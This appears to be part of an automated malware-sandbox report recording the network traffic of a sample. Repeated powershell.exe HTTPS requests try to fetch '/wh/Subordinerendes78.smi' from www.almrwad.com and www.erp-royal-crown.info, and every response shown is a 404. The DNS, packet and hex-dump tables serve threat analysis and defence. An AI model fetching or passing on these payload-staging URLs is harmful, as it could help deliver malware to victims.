                                                  Dec 5, 2024 10:42:27.643716097 CET44349743184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:27.644848108 CET49743443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:27.644872904 CET44349743184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:28.105956078 CET44349743184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:28.106048107 CET44349743184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:28.106113911 CET49743443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:28.126296997 CET49743443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:32.223843098 CET49744443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:32.223897934 CET44349744148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:32.224009991 CET49744443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:32.224231005 CET49744443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:32.224247932 CET44349744148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:33.620743036 CET44349744148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:33.622117996 CET49744443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:33.622143984 CET44349744148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:34.170705080 CET44349744148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:34.170902967 CET44349744148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:34.170981884 CET49744443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:34.171360970 CET49744443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:38.192267895 CET49746443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:38.192315102 CET44349746184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:38.192408085 CET49746443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:38.192636013 CET49746443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:38.192650080 CET44349746184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:39.644301891 CET44349746184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:39.645663977 CET49746443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:39.645692110 CET44349746184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:40.107645988 CET44349746184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:40.107723951 CET44349746184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:40.107809067 CET49746443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:40.108243942 CET49746443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:44.114573002 CET49758443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:44.114634991 CET44349758148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:44.114731073 CET49758443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:44.115078926 CET49758443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:44.115092993 CET44349758148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:45.542413950 CET44349758148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:45.543772936 CET49758443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:45.543797970 CET44349758148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:46.087114096 CET44349758148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:46.087338924 CET44349758148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:46.087392092 CET49758443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:46.087683916 CET49758443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:50.083163977 CET49774443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:50.083236933 CET44349774184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:50.083328009 CET49774443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:50.083581924 CET49774443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:50.083600998 CET44349774184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:51.342288017 CET44349774184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:51.343539953 CET49774443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:51.343574047 CET44349774184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:51.802319050 CET44349774184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:51.802392960 CET44349774184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:51.803493977 CET49774443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:51.803889036 CET49774443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:55.817496061 CET49786443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:55.817544937 CET44349786148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:55.817637920 CET49786443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:55.817919016 CET49786443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:55.817929983 CET44349786148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:57.229000092 CET44349786148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:57.231056929 CET49786443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:57.231097937 CET44349786148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:57.778462887 CET44349786148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:57.778681040 CET44349786148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:57.778726101 CET49786443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:57.779217958 CET49786443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:01.787853956 CET49801443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:01.787900925 CET44349801184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:01.788239002 CET49801443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:01.788239002 CET49801443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:01.788274050 CET44349801184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:03.049154997 CET44349801184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:03.062088013 CET49801443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:03.062124968 CET44349801184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:03.510288000 CET44349801184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:03.510365009 CET44349801184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:03.510534048 CET49801443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:03.511346102 CET49801443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:07.520534992 CET49817443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:07.520591021 CET44349817148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:07.520677090 CET49817443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:07.520889044 CET49817443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:07.520900011 CET44349817148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:08.919774055 CET44349817148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:08.920809031 CET49817443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:08.920830965 CET44349817148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:09.466707945 CET44349817148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:09.466882944 CET44349817148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:09.466969013 CET49817443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:09.467422009 CET49817443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:13.485877037 CET49833443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:13.485918999 CET44349833184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:13.485981941 CET49833443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:13.486263037 CET49833443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:13.486275911 CET44349833184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:14.752337933 CET44349833184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:14.753416061 CET49833443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:14.753448009 CET44349833184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:15.212615967 CET44349833184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:15.212734938 CET44349833184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:15.212796926 CET49833443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:15.213160992 CET49833443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:19.247931957 CET49844443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:19.247997999 CET44349844148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:19.248094082 CET49844443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:19.248584986 CET49844443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:19.248598099 CET44349844148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:20.651515961 CET44349844148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:20.653148890 CET49844443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:20.653260946 CET44349844148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:21.197750092 CET44349844148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:21.198033094 CET44349844148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:21.198087931 CET49844443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:21.198609114 CET49844443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:25.225842953 CET49860443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:25.225895882 CET44349860184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:25.225959063 CET49860443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:25.226301908 CET49860443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:25.226320028 CET44349860184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:26.488837004 CET44349860184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:26.491938114 CET49860443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:26.491960049 CET44349860184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:26.949496984 CET44349860184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:26.949579954 CET44349860184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:26.949693918 CET49860443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:26.950176001 CET49860443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:30.975912094 CET49876443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:30.975991011 CET44349876148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:30.976068974 CET49876443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:30.976386070 CET49876443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:30.976403952 CET44349876148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:32.372203112 CET44349876148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:32.373467922 CET49876443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:32.373493910 CET44349876148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:32.914637089 CET44349876148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:32.914832115 CET44349876148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:32.914933920 CET49876443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:32.915153980 CET49876443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:36.927901030 CET49887443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:36.927953959 CET44349887184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:36.935219049 CET49887443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:36.939903021 CET49887443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:36.939922094 CET44349887184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:38.201030016 CET44349887184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:38.204096079 CET49887443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:38.204123974 CET44349887184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:38.662282944 CET44349887184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:38.662377119 CET44349887184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:38.662622929 CET49887443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:38.662870884 CET49887443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:42.663767099 CET49903443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:42.663827896 CET44349903148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:42.666644096 CET49903443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:42.666796923 CET49903443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:42.666814089 CET44349903148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:44.066129923 CET44349903148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:44.067996979 CET49903443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:44.068027020 CET44349903148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:44.615699053 CET44349903148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:44.615885973 CET44349903148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:44.615978956 CET49903443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:44.616322041 CET49903443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:48.614432096 CET49918443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:48.614495993 CET44349918184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:48.614638090 CET49918443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:48.614902020 CET49918443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:48.614918947 CET44349918184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:49.875910997 CET44349918184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:49.877970934 CET49918443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:49.877980947 CET44349918184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:50.336266994 CET44349918184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:50.336348057 CET44349918184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:50.336450100 CET49918443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:53.988748074 CET49918443192.168.2.4184.171.244.231

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 5, 2024 10:41:44.828754902 CET5540653192.168.2.41.1.1.1
                                                  Dec 5, 2024 10:41:44.968847036 CET53554061.1.1.1192.168.2.4
                                                  Dec 5, 2024 10:41:56.850373983 CET5425253192.168.2.41.1.1.1
                                                  Dec 5, 2024 10:41:56.990845919 CET53542521.1.1.1192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 5, 2024 10:41:44.828754902 CET192.168.2.41.1.1.10x887dStandard query (0)www.almrwad.comA (IP address)IN (0x0001)false
                                                  Dec 5, 2024 10:41:56.850373983 CET192.168.2.41.1.1.10x4f90Standard query (0)www.erp-royal-crown.infoA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 5, 2024 10:41:44.968847036 CET1.1.1.1192.168.2.40x887dNo error (0)www.almrwad.comalmrwad.comCNAME (Canonical name)IN (0x0001)false
                                                  Dec 5, 2024 10:41:44.968847036 CET1.1.1.1192.168.2.40x887dNo error (0)almrwad.com184.171.244.231A (IP address)IN (0x0001)false
                                                  Dec 5, 2024 10:41:56.990845919 CET1.1.1.1192.168.2.40x4f90No error (0)www.erp-royal-crown.infoerp-royal-crown.infoCNAME (Canonical name)IN (0x0001)false
                                                  Dec 5, 2024 10:41:56.990845919 CET1.1.1.1192.168.2.40x4f90No error (0)erp-royal-crown.info148.251.114.233A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • www.almrwad.com
                                                  • www.erp-royal-crown.info

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449730184.171.244.2314437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:41:46 UTC183OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                  Host: www.almrwad.com
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:41:46 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 05 Dec 2024 09:41:46 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-12-05 09:41:46 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449731184.171.244.2314437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:41:52 UTC65OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.almrwad.com
                                                  2024-12-05 09:41:52 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 05 Dec 2024 09:41:52 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-12-05 09:41:52 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.449732148.251.114.2334437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:41:58 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.erp-royal-crown.info
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:41:58 UTC238INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                  pragma: no-cache
                                                  content-type: text/html
                                                  content-length: 1251
                                                  date: Thu, 05 Dec 2024 09:41:58 GMT
                                                  server: LiteSpeed
                                                  2024-12-05 09:41:58 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                  2024-12-05 09:41:58 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.449737184.171.244.2314437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:42:04 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.almrwad.com
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:42:04 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 05 Dec 2024 09:42:04 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-12-05 09:42:04 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.449740148.251.114.2334437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:42:10 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.erp-royal-crown.info
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:42:10 UTC238INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                  pragma: no-cache
                                                  content-type: text/html
                                                  content-length: 1251
                                                  date: Thu, 05 Dec 2024 09:42:10 GMT
                                                  server: LiteSpeed
                                                  2024-12-05 09:42:10 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                  2024-12-05 09:42:10 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.449741184.171.244.2314437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:42:15 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.almrwad.com
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:42:16 UTC164INHTTP/1.1 404 Not Found
